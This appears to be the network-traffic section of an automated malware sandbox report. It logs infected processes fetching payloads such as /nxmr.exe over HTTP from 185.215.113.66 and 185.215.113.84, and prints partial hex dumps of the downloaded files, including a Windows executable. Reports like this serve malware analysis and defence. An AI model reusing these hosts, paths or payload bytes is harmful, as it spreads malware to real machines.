                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                  Nov 30, 2024 01:55:14.681485891 CET1236INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
                                                                                                                  Nov 30, 2024 01:55:14.681504965 CET1236INData Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1
                                                                                                                  Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\
                                                                                                                  Nov 30, 2024 01:55:14.681966066 CET1236INData Raw: 0b a6 7d 79 c6 0e 19 41 de 44 a9 03 74 f2 fb a9 92 bc 27 b6 69 9d 42 1a 59 26 6e 6d a8 df 05 cd 7b e6 9c e9 45 0f 67 74 bc 1a e1 59 dd 58 26 67 a8 cb ea 52 87 27 f1 9b fe 95 bd 52 bf 68 3a 2f 74 d5 bc 82 48 3c f6 ef 52 41 bf 9a 2d b2 e4 48 3f 02
                                                                                                                  Data Ascii: }yADt'iBY&nm{EgtYX&gR'Rh:/tH<RA-H?:3a$8;SU*rN1QIuc>"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;B
                                                                                                                  Nov 30, 2024 01:55:14.681978941 CET1236INData Raw: 0e 0b 73 b4 cc 61 72 90 49 03 c9 0c 34 6e 73 ed 3b 3f 45 e7 2a 84 8c 3b 11 6d 21 89 00 60 23 47 8c c2 4b 9e c0 2c d8 47 80 38 fd e5 6a f8 e1 31 10 55 0b 54 d4 89 df 1b da 0d 24 5b 6e ee 18 45 4b 11 59 49 7e 62 cf 22 93 99 ab 6f bd b6 fe 39 0b 36
                                                                                                                  Data Ascii: sarI4ns;?E*;m!`#GK,G8j1UT$[nEKYI~b"o96{'#S(cJK4*Hft5U>1uauV|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&A
                                                                                                                  Nov 30, 2024 01:55:14.681988955 CET1236INData Raw: 52 57 11 8b 24 3e 89 1b 44 e8 11 27 36 d3 98 6c 64 5f c1 5e 36 d1 aa 50 5a 3a 84 e5 9f 20 97 64 a4 c0 4b 41 9b fa 0a f4 83 09 e0 69 91 cf e7 2c d4 09 d5 e4 18 60 53 3c 4e cb 83 5e 89 f8 2f 97 1b db be 93 32 73 f7 8d f7 65 6f 24 ee f6 74 d5 08 d2
                                                                                                                  Data Ascii: RW$>D'6ld_^6PZ: dKAi,`S<N^/2seo$tRu@.\]=/E,PX<yu6CIEF`!Ue$u9r;SwjF"dDxsWY/"4|bob`|bS
                                                                                                                  Nov 30, 2024 01:55:14.682892084 CET1236INData Raw: b5 f2 e5 56 94 d5 a7 ba 2e 4b ef 19 cb 34 b8 a7 99 e1 80 8c cc c0 91 a1 56 e3 29 95 04 e6 0f b9 a5 86 93 81 fe fb 19 09 f6 66 dc 6a 30 a9 58 e4 78 2d 5f 4e 45 b3 14 af 02 96 da 20 60 39 3e 4b 48 c0 80 cb 76 02 0b 8c c1 87 09 1a bc 98 6d 65 18 af
                                                                                                                  Data Ascii: V.K4V)fj0Xx-_NE `9>KHvme#R]/I{J4],GCrJZ3;:U$=%W&^/UR1i [kkRh1;Cz^DO"j$qQT`r!Q[(7_`E
                                                                                                                  Nov 30, 2024 01:55:14.682904959 CET1236INData Raw: 28 11 af e2 41 9b fa 51 e9 ab d8 2a 79 da ce 15 40 37 b8 70 18 de 0f 5b 95 e6 1e b5 38 1d 61 99 66 96 eb c4 00 1f 65 72 58 fc 2e 42 79 8e 29 b8 e0 15 7b 9e 33 1a 0b 8c e5 49 8f 3e 92 cc 6d 67 59 91 10 68 27 3e 93 f3 d5 fa 1d e9 90 99 e6 46 67 f1
                                                                                                                  Data Ascii: (AQ*y@7p[8aferX.By){3I>mgYh'>Fg),},([vUl s?u/AsGbrRbV1oLE?fpK`|cv\}0>jmer^kvrM5uMW~c3FzWSkUM@q
                                                                                                                  Nov 30, 2024 01:55:14.682917118 CET873INData Raw: b7 1b ed 55 22 52 87 a3 c5 38 9f b8 98 95 ff b4 f2 c4 e9 dd 2d 0b 3c 5d 3d 5e 30 5e fd c6 f8 54 b4 2a e8 93 3d a8 1f 7d 5c e5 4d 1d c9 7e cb 06 5c 4c 2c 00 33 bd 10 e0 11 48 3b 01 7b 52 15 1a d2 67 2c a4 26 fc e8 3f 86 7e 08 4f 27 64 b0 a6 1b 25
                                                                                                                  Data Ascii: U"R8-<]=^0^T*=}\M~\L,3H;{Rg,&?~O'd%`dJU]~Y:|2Jd-\ Q@n\|{hYc$P;.s^X"@Nn>$2Y+J@Y},?r`41RmU\gd
                                                                                                                  Nov 30, 2024 01:55:19.766916037 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:20.218185902 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:19 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 63232
                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67497f08-f700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                  Nov 30, 2024 01:55:20.218314886 CET1236INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|d
                                                                                                                  Nov 30, 2024 01:55:20.222296953 CET248INData Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b
                                                                                                                  Data Ascii: a;^;3|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.449740185.215.113.84807332C:\Users\user\AppData\Local\Temp\2736615137.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:18.932161093 CET177OUTGET /nxmr.exe HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                  Host: 185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:20.327219963 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:20 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 5827584
                                                                                                                  Last-Modified: Fri, 27 Sep 2024 20:03:46 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "66f70fa2-58ec00"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 [TRUNCATED]
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdf.&X@pYY` Y4PYXX`Y0X("YP.textP``.dataVV@.rdata9X:xX@@.pdataXXX@@.xdataXX@@.bssY.idata4 YX@.CRT`0YX@.tls@YX@.rsrcPYX@.reloc0`YX@B
                                                                                                                  Nov 30, 2024 01:55:20.327356100 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 0f 1f 44 00 00 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 75 b1
                                                                                                                  Data Ascii: Df.H(HuX1HvXHyXHXf8MZuHcP<H8PEtfHXXuCqTkHXTkHXdHmX8tI1H(p
                                                                                                                  Nov 30, 2024 01:55:20.327366114 CET1236INData Raw: fd ff ff 89 c1 e8 2b 6d 01 00 90 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 c5 ac 58 00 c7 00 01 00 00 00 e8 ba fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 a5 ac 58 00 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3
                                                                                                                  Data Ascii: +mf.H(HXH(H(HXH(H(lHH(H@HIXHP!HH9uHXHPfHH9uHXHPfHH9uH}XHPfH
                                                                                                                  Nov 30, 2024 01:55:20.327728033 CET1236INData Raw: d6 4c 89 c5 4d 89 cc 48 8d 7c 24 20 41 b8 08 02 00 00 ba 00 00 00 00 48 89 f9 e8 9a 68 01 00 4d 89 e0 48 89 ea 48 89 f9 e8 34 28 00 00 89 f2 48 89 d9 e8 35 fe ff ff 41 89 f0 48 89 da 48 89 f9 e8 c8 35 00 00 90 48 81 c4 30 02 00 00 5b 5e 5f 5d 41
                                                                                                                  Data Ascii: LMH|$ AHhMHH4(H5AHH5H0[^_]A\UWVSHH)H$8H$8A6>HH@ HH$0Agf$Pf$R f$Tf$Vf$Xf$Z
                                                                                                                  Nov 30, 2024 01:55:20.327739954 CET1236INData Raw: 7c 01 00 00 67 00 66 c7 84 24 7e 01 00 00 93 00 66 c7 84 24 80 01 00 00 a7 00 66 c7 84 24 82 01 00 00 a6 00 66 c7 84 24 84 01 00 00 ae 00 66 c7 84 24 86 01 00 00 9c 00 66 c7 84 24 88 01 00 00 a9 00 66 c7 84 24 8a 01 00 00 aa 00 66 c7 84 24 8c 01
                                                                                                                  Data Ascii: |gf$~f$f$f$f$f$f$f$f$f$f$f$ef$f$f$f$7=Xu<XHXDPfAHH'unXHm=Xt
                                                                                                                  Nov 30, 2024 01:55:20.327749968 CET1236INData Raw: 01 00 00 1a 00 66 c7 84 24 54 01 00 00 36 00 66 c7 84 24 56 01 00 00 30 00 66 c7 84 24 58 01 00 00 3f 00 66 c7 84 24 5a 01 00 00 3c 00 66 c7 84 24 5c 01 00 00 40 00 66 c7 84 24 5e 01 00 00 3c 00 66 c7 84 24 60 01 00 00 33 00 66 c7 84 24 62 01 00
                                                                                                                  Data Ascii: f$T6f$V0f$X?f$Z<f$\@f$^<f$`3f$bAf$df$f$f$h6f$j;f$l1f$n<f$pDf$r@f$tf$v f$x2f$z0f$|Bf$~?f$6f$
                                                                                                                  Nov 30, 2024 01:55:20.328449011 CET776INData Raw: c7 84 24 6a 01 00 00 e0 00 66 c7 84 24 6c 01 00 00 de 00 66 c7 84 24 6e 01 00 00 ef 00 66 c7 84 24 70 01 00 00 ee 00 66 c7 84 24 72 01 00 00 d7 00 66 c7 84 24 74 01 00 00 df 00 66 c7 84 24 76 01 00 00 f5 00 66 c7 84 24 78 01 00 00 e0 00 66 c7 84
                                                                                                                  Data Ascii: $jf$lf$nf$pf$rf$tf$vf$xf$zf$|f$~f$f$f$f$f$f${==Xu<xXH0XDPfAHHuXH=<X
                                                                                                                  Nov 30, 2024 01:55:20.328480959 CET1236INData Raw: 94 44 50 01 00 00 66 89 14 41 48 83 c0 01 48 83 f8 09 75 ea c6 05 a2 d9 58 00 01 48 8d 0d a7 eb ff ff e8 d6 e9 ff ff 80 3d b1 d9 58 00 00 74 29 48 8d 15 96 d9 58 00 48 8d 4a 12 0f b7 02 66 2d e9 6c 66 25 ff 00 66 89 02 48 83 c2 02 48 39 d1 75 e9
                                                                                                                  Data Ascii: DPfAHHuXH=Xt)HXHJf-lf%fHH9uXHmXHHH$L#X^f$Pf$Rf$Tf$Vf$Xf$Zf$\f$^f$`g=Xu<XH
                                                                                                                  Nov 30, 2024 01:55:20.328490973 CET1236INData Raw: c0 01 48 3d 92 01 00 00 75 e8 c6 05 b0 d0 58 00 01 48 8d 0d 60 e7 ff ff e8 0c e5 ff ff 80 3d d9 d3 58 00 00 74 2c 48 8d 15 ac d0 58 00 48 8d 8a 24 03 00 00 0f b7 02 66 2d dd 0c 66 25 ff 00 66 89 02 48 83 c2 02 48 39 ca 75 e9 c6 05 ab d3 58 00 00
                                                                                                                  Data Ascii: H=uXH`=Xt,HXH$f-f%fHH9uX%XHXLXH=,Xu>3Xf"XfXfXfX]XHl=Xt)HXHJff%fHH9uXH
                                                                                                                  Nov 30, 2024 01:55:20.328502893 CET1236INData Raw: cb 58 00 48 8d 4a 1c 0f b7 02 66 2d e1 38 66 25 ff 00 66 89 02 48 83 c2 02 48 39 d1 75 e9 c6 05 ac cb 58 00 00 48 8d 15 09 cf 58 00 48 8d 0d 82 cb 58 00 e8 dd 4c 01 00 48 8d 94 24 20 14 00 00 85 c0 75 08 48 8d 94 24 30 16 00 00 48 8d 8c 24 50 01
                                                                                                                  Data Ascii: XHJf-8f%fHH9uXHXHXLH$ uH$0H$PLXuZLc>XL3XH$D$@H|XHD$8H$ HD$0H$PHD$(HD$ HX#LcGXLHT$\H$HH$DD$\
                                                                                                                  Nov 30, 2024 01:55:20.447396994 CET1236INData Raw: 83 f8 61 75 ed c6 05 4d d6 58 00 01 48 8d 0d 09 ff ff ff e8 69 db ff ff 80 3d 14 d7 58 00 00 74 2c 48 8d 15 49 d6 58 00 48 8d 8a c2 00 00 00 0f b7 02 66 05 3b 2f 66 25 ff 00 66 89 02 48 83 c2 02 48 39 ca 75 e9 c6 05 e6 d6 58 00 00 48 8d 0d 1d d6
                                                                                                                  Data Ascii: auMXHi=Xt,HIXHf;/f%fHH9uXHXHf$`HL$@AH^X7H=Xu9XHXTD@fAHHauXH=Xt,HXHf;/f%fHH9ubXH


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.449743185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:55:21.373349905 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.714238882 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:55:22 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 63232
                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67497f08-f700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                  Nov 30, 2024 01:55:22.714394093 CET1236INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|d
                                                                                                                  Nov 30, 2024 01:55:22.714406013 CET1236INData Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b
                                                                                                                  Data Ascii: a;^;3|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
                                                                                                                  Nov 30, 2024 01:55:22.714863062 CET1236INData Raw: b3 14 96 cb 1c 0a 64 65 9f 17 1d 52 f9 ae 09 c2 59 f9 97 5b 06 44 1f 60 d5 dc 83 2e 98 cf df f1 08 5d 1d 36 10 63 69 37 f3 11 47 73 c1 1c ec 75 9f a3 5e 11 a4 d3 cd 83 6a 32 cd da 5f a2 80 b4 0b 03 1e 6e e5 80 35 9f 8f 49 86 b6 da c7 ab 4e 6a ba
                                                                                                                  Data Ascii: deRY[D`.]6ci7Gsu^j2_n5INj.`/#(W{[uhRfdy6z[$PzqmAEH]6t:FvqlDFT|JG9_,l{!G6eMqP_d
                                                                                                                  Nov 30, 2024 01:55:22.714874029 CET1236INData Raw: 6d 0d 07 a8 a1 69 a5 5a 9f 67 bb a2 b3 a3 1a 7b df b0 97 3e 9f 20 d8 e2 0f 63 0c 38 c6 ce 9e b0 77 92 c6 65 37 7a e5 0d a5 58 6c cb b5 27 81 75 a6 c5 28 35 e5 3c c3 09 59 f7 dd 4d 9e 8b b5 64 6b e3 1f 4d ed 5b 6c 04 4e ae 54 c3 03 55 4a 4f 76 43
                                                                                                                  Data Ascii: miZg{> c8we7zXl'u(5<YMdkM[lNTUJOvCS\u#~z;}#+!%vk@E}rOFmbiVo(s<^]G,:\iLnc\.+#sE@-# ltx5=oPZr
                                                                                                                  Nov 30, 2024 01:55:22.714884996 CET1236INData Raw: 84 db 0e 73 27 8c 8e 32 19 7c 5f 7e 88 3f 77 9c 60 1b 86 3c 63 9f 5e d3 41 d2 d9 8a 4f 95 24 1c 1e f6 60 45 bf 19 d6 10 06 4b 4f 78 8f 76 05 5c 04 08 0b 84 be cf a5 90 5a 2f 4a 86 44 4c 3e 8e f6 2d dc 92 b9 a0 5e 28 d2 50 08 ce 41 d5 da a6 0e 57
                                                                                                                  Data Ascii: s'2|_~?w`<c^AO$`EKOxv\Z/JDL>-^(PAWS$0P"GgyUGdCj]}[`xT9/\^=}%1!lix7pwcdU"5glxDrcyzn#uZxT{4v
                                                                                                                  Nov 30, 2024 01:55:22.715626955 CET1236INData Raw: eb 8d 97 ab 4b 3a 53 7e da 7f 04 57 bf 19 a7 d6 f3 c3 06 10 b1 09 16 23 60 a7 ba 91 3f 02 de a7 97 e6 74 56 05 8f f9 4f 69 36 6f 76 dd a5 19 ef 75 eb ae 69 3c 09 59 9b 3f 79 da 82 48 6d 9c d2 ba 97 99 83 d8 37 62 31 82 6a 57 5c 5e 54 5f 48 89 00
                                                                                                                  Data Ascii: K:S~W#`?tVOi6ovui<Y?yHm7b1jW\^T_H#^fdD`[wj(MEmClltf99az(2>&n+owX0}n)y]EfiH7,>H79;~#4{`M1H<%>^At
                                                                                                                  Nov 30, 2024 01:55:22.715637922 CET1236INData Raw: 16 25 ae 88 64 71 0b 50 6d 5d 8c 63 a3 e9 91 25 1d aa 31 d9 aa 7a 7d 84 26 a2 95 76 45 23 54 e6 a5 ba c8 c4 c2 4f 36 d6 c9 45 2b a7 d0 b2 a6 b1 75 c4 a8 54 7d 9f da cf 6a dc 88 94 37 ff 38 1e b0 06 49 37 ed 2c 1a c5 bb 71 c3 2f 47 5a 84 9f a4 f8
                                                                                                                  Data Ascii: %dqPm]c%1z}&vE#TO6E+uT}j78I7,q/GZ`cr]c!E`qs7`.fg%yT_<Zi4V<NyDm}_Bh_3kSRUH|[E("[(uOtR<HcbJ&xF'KH
